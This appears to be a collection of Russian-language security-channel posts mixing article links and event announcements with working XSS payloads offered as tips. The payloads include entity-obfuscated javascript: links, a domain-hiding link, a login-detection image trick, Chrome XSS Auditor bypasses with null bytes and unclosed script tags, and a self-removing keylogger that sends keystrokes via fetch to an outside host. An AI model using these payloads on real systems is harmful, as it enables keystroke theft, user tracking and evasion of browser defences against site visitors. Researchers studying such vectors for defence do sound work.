Не до конца зафиксили))
https://hackerone.com/reports/186230

А чужой скайп-аккаунт можно удалять, отправив на него горсть жалоб. Вот так просто, да.
https://habrahabr.ru/post/316912/

Приключения xss векторов в необычных местах
https://bo0om.ru/xss-every-day

Когда символ пробела — атака
https://bo0om.ru/just-enter-the-space-attacks

Способы обхода проверки домена и IP адреса
https://bo0om.ru/domain-and-ip-checker-bypass

Погиб чертовски талантливый хакер, которого все знали как Крис Касперски, он же Мыщъх.

https://rsdn.org/forum/life/6717583.1
https://www.news-journalonline.com/news/20170213/sky-diver-injured-in-deland-remains-hospitalized

У тебя шнурки развязались

Привет! Го в CTF?
Там традиционный HackQuest запущен (hackquest.phdays.com), в качестве призов - инвайты на PHDays, сувениры и вот это вот все.

Привет, завтра буду на PHDays, в программе Lightning Talks (https://www.phdays.ru/program/248019/)
А послезавтра на Fast Track :)

Забегай, увидимся

В дополнение к статье.

<a href="javascript{entity}alert(1)">clickme</a>

Вместо двоеточия может быть:
:
:
: (ну и вариации двух последних)

В середине

<a href="ja{entity}vas{entity}cript:alert(1)">clickme</a>

	










Ну и %0a %0d %09 (знак табуляции) естественно, причем последний можно вовсе сократить до &#9

https://jsfiddle.net/423zcpL0/


Используя html entities подобмным образом можно скрыть ссылку на домен:

<a href="//&bsol;&sol;&commat;g&NoBreak;o&ZeroWidthSpace;o&zwnj;g&zwj;l&shy;e&NewLine;.&Tab;com">clickme</a>

https://jsfiddle.net/423zcpL0/1/

Ссылка ведет на google.com ¯\_(ツ)_/¯

Таблица с html entities для игр:
https://dev.w3.org/html5/html-author/charref

Бот для поиска готовых эксплойтов
@GetSploitBot

Предательство Safari. Чтение локальных файлов с дальнейшей отправкой на сервер помощью html документа.
https://xakep.ru/2017/07/06/safari-localfile-read/
https://github.com/Bo0oM/Safiler

Если ты пользователь twitter:
https://twitter.com/account/personalization/download_your_data.pdf

(На самом деле отображается корректно, если у профиля английский язык)

Забавная находка, в которой школьник получил доступ к одному из ресурсов внутренней инфраструктуры Google.
https://sites.google.com/site/testsitehacking/10k-host-header

Chrome закручивает гайки.

Раньше можно было передавать такую ссылку: https://username:[email protected], тем самым, передав значения логина и пароля для basic auth. Отныне и вовеки использовать их для атак вида <img src="//login:[email protected]"> - нельзя.

[Deprecation] Subresource requests whose URLs contain embedded credentials (e.g. `https://user:pass@host/`) are blocked. See https://www.chromestatus.com/feature/5669008342777856 for more details.

Также с client-side атаками, улучшают парсер, запрещают символ переноса строки у атрибутов тегов, если это ссылка:

[Deprecation] Resource requests whose URLs contain raw newline characters are deprecated, and may be blocked in M60, around August 2017. Please remove newlines from places like element attribute values in order to continue loading those resources. See https://www.chromestatus.com/features/5735596811091968 for more details.

То ли еще будет :)

Не все йогурты одинаково полезны!

Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.

<script/src=//html5sec.org/test.js></script>

вжух =>

<script src="//html5sec.org/test.js"></script>

https://twitter.com/i_bo0om/status/895896778914004993

Минималистичный кейлогер, который удаляется со страницы (но продолжает работать):

<img src=x onerror='document.onkeypress=function(e){fetch("//bo0om.ru?k="+String.fromCharCode(e.which))},remove()'>

Тем ребятам, которые не знают что делать, когда XSS в логине пользователя или в подобных местах :)

Старый добрый трюк, залогинен ли пользователь на ресурсе или нет - https://bo0om.ru/zn2014/sd/
На примере VK. Если пользователь имеет активную сессию на ресурсе, произойдет перенаправление на существующий файл favicon.ico, поэтому у тега img сработает событие "onload". Если сессии нет - пользователя перенаправит на страницу аутентификации, а так как img не сможет загрузить изображение - выполнится событие "onerror".

<img src="https://login.vk.com/?role=fast&to=ZmF2aWNvbi5pY28-" onload="alert('Yeah!')" onerror="alert('Nope!')" style="display:none;">

https://jsfiddle.net/gq2dtk5b/

А вот целый сборник подобных рецептов, https://github.com/RobinLinus/socialmedia-leak

Совсем недавно чувак с именем fabrizio обошел Chrome XSS Auditor с помощью... Нульбайта. Точнее семи нульбайтов:

◼️.ws/example.php?xss=%3Chello%3E%00%00%00%00%00%00%00%3Cscript%3Ealert(%27pew%27)%3C/script%3E

Не менее забавная находка - незакрытый тег </script, с условием, что после него будет перенос строки:

◼️.ws/example.php?xss=%3Cscript%3Ealert(%27pew%27)%3C/script


¯\_(ツ)_/¯